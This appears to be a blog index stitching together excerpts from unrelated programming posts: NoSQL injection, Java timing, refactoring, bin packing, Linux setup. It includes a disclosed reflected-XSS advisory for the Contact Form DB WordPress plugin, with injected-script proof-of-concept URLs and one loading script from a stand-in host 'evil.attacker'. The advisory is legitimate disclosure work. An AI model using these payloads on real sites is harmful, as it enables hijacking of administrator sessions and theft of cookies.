A list of resources about NoSQL injection in general and PHP and MongoDB security specifically.

• Intro: NoSQL Databases
• No Security by Default: NoSQL Authentication
• MongoDB Injection into JavaScript
• MongoDB Request Injection Attacks
• PHP & MongoDB: execute
• Securing NoSQL
• NoSQL Injection Example Code
• Links: More about NoSQL Security

Intro: NoSQL Databases

NoSQL databases such as MongoDB are used more and more, but there isn’t a lot of information about the security of specific NoSQL databases or the security of NoSQL in general.

The direction it seems to be going is: It’s not SQL, so SQL injection is not possible, so it is secure. This is of course not true at all. The damage that can be achieved with NoSQL injections does seem to be smaller than that of SQL injection, but that does not mean that developers should not care about it.

• Vulnerability: Reflected XSS
• Affected Software: Contact Form DB (WordPress Plugin)
• Affected Version: 2.8.17 (probably also prior versions)
• Patched Version: 2.8.18
• Risk: Medium
• Vendor Contacted: 2014-11-17
• Vendor Fix: 2014-11-19
• Public Disclosure: 2014-11-26

Description

There are two XSS vulnerabilities in the Contact Form DB WordPress Plugin admin area. If an attacker can get an administrator to click on a specific link, this can lead to the execution of arbitrary JavaScript, which in turn can for example lead to the stealing of cookies.

Simple POC

As single quotes are automatically escaped in WordPress, they cannot be used in the attack. It is still possible to inject a simple alert:

via submit_time:

http://localhost/wordpress/wp-admin/admin.php?page=CF7DBPluginSubmissions&form_name=Contact+form+1&submit_time=1416134948.8682" type="hidden"><script>alert(String.fromCharCode(88,83,83))</script><input name="1416134948.8682

via form_name:

http://localhost/wordpress/wp-admin/admin.php?page=CF7DBPluginSubmissions&form_name=Contact+form+1"><script>alert(String.fromCharCode(88,83,83));</script>

Exploiting the vulnerability

To get around the limitation of not using single quotes, an attacker can load a remotely hosted script:

http://localhost/wordpress/wp-admin/admin.php?page=CF7DBPluginSubmissions&form_name=Contact+form+1&submit_time=1416134948.8682" type="hidden"><script src=http://evil.attacker/myscript.js></script>

Often times, you will have two Java functions, and you will want to know which one performs better. You can use this Java class to time multiple methods to find out which one is faster.

• Example Usage: Java Timing Code
• Example Output of Timing Result
• Source Code: Timing Java Functions
• Thanks and License

Example Usage: Java Timing Code

Let’s say you have these two functions and want to know which one is faster:

public static String function1(String i) {
    return i + i;
}

public static String function2(String i) {
    StringBuilder sb = new StringBuilder();
    sb.append(i);
    sb.append(i);
    return sb.toString();
}

Here is how you would use my timing class:

public static void simpleTimingTest() throws Exception {
    Timing t = new Timing();

    /*
    The timing function will run the tests in chunks.
    For each chunk, the same input will be used.

    Input will be gathered via the passed IntFunction. The timing method will
    pass the current index (going from 0 to amountRunsPerChunk) to it and will expect
    any return of the defined type.
    */
    IntFunction<String> inputProvider = i -> String.valueOf(i);

    /*
    The add method expects two functions: the above mentioned input provider,
    as well as a function which accepts the output from the input provider as input
    and applies it to the function which will be timed.
    */
    t.add((String s) -> function1(s), inputProvider, "function1 ");
    t.add((String s) -> function2(s), inputProvider, "function2 ");

    t.time(true); // true: force test (otherwise, time might throw an exception
                  // if it suspects that there isn't enough memory)
    t.output(s -> System.out.println(s), Timing.Sort.ASC);
}

You can also do more complex things with it:

public static void predefinedInputTimingTest() throws Exception {
    Timing t = new Timing();
    /*
    The input doesn't have to be generated using the passed index, you could
    also use predefined input to time your functions:
    */
    String[] input = new String[]{"input1", "another input", "more input"};
    IntFunction<String> inputProvider = i -> input[i % input.length];
    t.add((String s) -> function1(s), inputProvider, "function1 ");
    t.add((String s) -> function2(s), inputProvider, "function2 ");

    /*
    You can decide what should be reported when timing finished:
    */
    t.setReport(EnumSet.of(Timing.Report.NAME, Timing.Report.MEAN));
    t.setAmountChunks(1_500);
    t.setAmountRunsPerChunk(2_500);
    t.time(true, s -> System.out.println(s)); // pass String -> String function to report debug information
    t.output(s -> System.out.println(s), Timing.Sort.ASC);
}

Deeply nested if statements are a pain to read and maintain, so you should try to avoid them as much as possible. Here are a couple of suggestions on how reduce deeply nested if statements to a more manageable size.

Most of these suggestions can be applied to most languages that have the if statement, at least most object oriented or procedural languages. But my main focus when writing this were Java and PHP.

• Early Return
• Refactoring if-if
• Refactoring if-if-else
• Use else if
• Move Code to its own Function
• Redundant Checks

Early Return

Early returns should be used a lot more often by pretty much everybody. It’s one of the easiest ways to avoid or reduce deeply nested if statements and one of the first things I would look for when refactoring code.

The main idea is that when checking a value, the negative case is moved up-front, the error handled, and then the method is exited:

boolean test1 = ...;
if (test1) {
    boolean test2 = ...;
    if(test2) {
        boolean test3 = ...;
        if(test3) {
            // do the stuff
        } else {
            // some error, handle it
        }
    } else {
        // something else
    }
} else {
    // some other error, handle it
}
return;

Here, you can move the checks to the top of the method and remove three levels of nested if statements:

boolean test1 = ...;
if(!test1) {
    // some other error, handle it
    return;
}
boolean test2 = ...;
if(!test2) {
    // something else
    return;
}
boolean test3 = ...;
if(!test3) {
    // some error, handle it
    return;
}
// do the stuff
return;

How to refactor simple boolean checks in if statements and avoid bad practices. This is the first post out of a number of posts dealing with refactoring. This particular post is aimed at beginners, but further posts will contain somewhat more advanced concepts. The concepts presented here can be used in a lot of programming languages, but the article is written with Java, PHP, and JavaScript in mind. For one-liners, the general formating will look like this:

In this post I will present example Java code for solving the Bin Packing Problem. I will not go into what exactly Bin Packing is, as there are enough websites that do a good job describing it. As always, wikipedia is a good start to get a general overview: Wikipedia Bin Packing Problem. Bin Packing: Brute Force Solution Bin Packing: First Fit Decreasing Algorithm Download Source Code for Bin Packing Problem Bin Packing: Brute Force Solution To check all possible solutions for the bin packaging problem (brute force), a recursive approach can be used: Iterate over all bins, try to put the current item in the bin and – if it fits – call the same method with the next item.

Linux Mint does not provide the option to remove a ppa. If you try it, this will be the result: sudo add-apt-repository --remove ppa:somePPA/ppa Usage: add-apt-repository [options] repository add-apt-repository: error: no such option: --remove But you can still manually remove a ppa in Linux Mint by removing the file that defines it. All ppa are defined in /etc/apt/sources.list.d . So you can do the following: # find the correct ppa file to delete by listing all ppa files: ls /etc/apt/sources.

There is a lot of different UML modelling software to choose from. Here, I will create a short overview over the most common free uml tools. This list is not meant as an exaustive review, but more to give you an idea what each of the tools can to so you have an easier time choosing the uml tool that is best for you. Gaphor ArgoUML Dia Violet UML Editor UMLet yEd Papyrus Modelio Further free UML Modelling Software What’s the best free UML tool?

The official Ruby on Rails documentation has a good guide on how to install Ruby on Rails. I still had some problems setting everything up, so here I will describe how I installed Ruby on Rails on Linux (LMDE). Installing Ruby on Linux Before installing Ruby on Rails we need to install Ruby as well as Ruby Gems and sqlite: sudo apt-get install ruby rubygems sqlite3 Installing Ruby on Rails on Linux sudo gem install rails -V -V because otherwise you will get no direct feedback.

The solution that I found for installing qgis (Quantum GIS) on LMDE (Linux Mint Debian Edition) is not optimal, but the only one that worked for me. I am getting QGIS directly from the QGIS Debian repository and I am temporarily adding the main debian repository to my sources, because QGIS depends on some packages that are not included in LMDE. LMDE: Install QGIS Add QGIS to your sources.